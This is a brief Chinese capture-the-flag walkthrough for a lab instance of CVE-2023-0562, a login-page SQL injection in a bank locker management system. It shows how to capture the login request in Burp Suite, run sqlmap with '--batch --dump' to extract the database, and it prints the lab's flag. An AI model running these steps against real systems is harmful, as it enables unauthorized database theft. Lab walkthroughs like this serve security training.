【春秋云镜】 CVE-2023-0562银行储物柜管理系统登录页面sql注入漏洞靶场攻略

靶标介绍：
银行储物柜管理系统是一个基于网络的应用程序，用于处理存储银行客户贵重物品的银行储物柜。储物柜的所有详细信息都保存在数据库中。银行储物柜管理系统项目是使用 PHP 和 MySQLi 扩展开发的。

靶场地址：
http://eci-2zei3vj2nmsbbmi4nur6.cloudeci1.ichunqiu.com/
随便点点，找到个后台
http://eci-2zei3vj2nmsbbmi4nur6.cloudeci1.ichunqiu.com/banker/index.php
打开burpsuite开始抓包
在浏览器设置代理8080
输入admin 12345
登录
把靶场的那个请求发送到Repeater模块，右键保存成55.txt

打开sqlmap
D:\天狐渗透工具箱-社区版V1.3\gui_scan\sqlmap>python sqlmap.py -h

使用sqlmap进行验证
sqlmap.py -r 55.txt --batch --dump
D:\天狐渗透工具箱-社区版V1.3\gui_scan\sqlmap>
python sqlmap.py -r E:\100.打靶\CVE-2023-0562银行储物柜管理系统登录页面sql注入漏洞\55.txt --batch --dump

直接跑出来了 flag{eec99f9c-d4c7-4ce9-a165-d047d08e342d}